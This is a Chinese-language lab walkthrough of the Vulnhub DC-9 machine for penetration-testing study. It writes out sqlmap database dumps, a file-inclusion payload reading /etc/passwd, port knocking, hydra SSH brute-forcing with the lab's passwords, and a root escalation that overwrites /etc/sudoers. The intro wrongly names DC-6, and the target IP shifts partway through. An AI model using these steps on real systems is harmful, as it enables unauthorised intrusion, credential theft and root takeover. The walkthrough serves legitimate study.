本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列DC-6靶机有定的了解
一、信息收集阶段
DC-9靶场信息:
DC-9靶场介绍:
https://www.vulnhub.com/entry/dc-9,412/
DC-9靶场下载:
https://download.vulnhub.com/dc/DC-9.zip
因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/24
1、扫描网段,发现主机
nmap -sP 192.168.60.0/24
2、扫描主机详细信息
nmap -sT -sV -sC 192.168.60.169
# -sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
# -sV 尝试确定每个打开端口上运行的服务的版本
# -sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等
二、攻击面寻找及攻击阶段
1、Wappalyzer插件
2、网站信息
3、burp suite 模糊测试sql注入
4、sqlmap sql注入测试
(1)复制burp suite抓取的请求包到post.txt文件
(2)sqlmap测试post文件内的请求数据包
sqlmap -r post.txt
(3)sqlmap获取数据库库名
sqlmap -r post.txt --dbs
(4)sqlmap获取users数据库的表的名
sqlmap -r post.txt -D users --tables
(5)sqlmap获取获取users数据库,UserDetails表的字段名
sqlmap -r post.txt -D users -T UserDetails --columns
(6)sqlmap获取获取users数据库,UserDetails表,username跟password字段内容
sqlmap -r post.txt -D users -T UserDetails -C username --dump
sqlmap -r post.txt -D users -T UserDetails -C password --dump
(7)sqlmap获取Staff库的表名
sqlmap -r post.txt -D Staff --tables
(8)sqlmap获取Staff库,Users表里面的字段名
sqlmap -r post.txt -D Staff -T Users --columns
(9)sqlmap获取Staff库,Users表里面的username跟password字段的信息
sqlmap -r post.txt -D Staff -T Users -C Username --dump
sqlmap -r post.txt -D Staff -T Users -C Password --dump
(10)MD5解密
5、sqlmap获取的admin账号登录平台
6、查看文件包含漏洞
192.168.60.169/welcome.php?file=../../../../etc/passwd
7、敲击端口打开隐藏ssh端口
http://192.168.60.169/manage.php?file=../../../../etc/knockd.conf
在信息收集阶段我们知道ssh端口应该是被隐藏了,我们利用文件包含漏洞查看到需要打开的三个端口。使用knock去敲击
#kali安装knockd
#sudo apt-get install knockd knock 192.168.60.169 7469 8475 9842 #敲击目标主机
8、hydra爆破ssh
#九头蛇
hydra -L 1.txt -P 2.txt ssh://192.168.60.169 #nmap
nmap -p 22 --script=ssh-brute --script-args userdb=1.txt,passdb=2.txt 192.168.60.169
9、登录janitor用户信息收集
#[22][ssh] host: 192.168.60.169 login: chandlerb password: UrAG0D!
#[22][ssh] host: 192.168.60.169 login: joeyt password: Passw0rd
#[22][ssh] host: 192.168.60.169 login: janitor password: Ilovepeepeessh janitor@192.168.60.169
ls -al #查看全部文件
cd .secrets-for-putin
cat cat passwords-found-on-post-it-notes.txt
10、hydra重新爆破ssh
获得新的的账号密码:fredf 密码:B4-Tru3-001
11、查看sudo -l
三、提权阶段
1、前面已经通过knock敲击端口
knock 192.168.111.137 7469 8475 9842
2、查看test源码
根据sudo -l已知文件目录(root) NOPASSWD: /opt/devstuff/dist/test/test
cd /opt/devstuff/
ls
3、自定义 sudo 规则作为提权
echo "fredf ALL=(root) NOPASSWD:ALL" > /tmp/abc.txt #fredf 用户可以在任何主机以root身份运行任何命令
4、写入 /etc/sudoers文件
sudo /opt/devstuff/dist/test/test /tmp/abc.txt /etc/sudoers
5、提权成功
sudo su root
声明! 学习内容来自B站up主 泷羽sec的OSCP考证培训课程有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!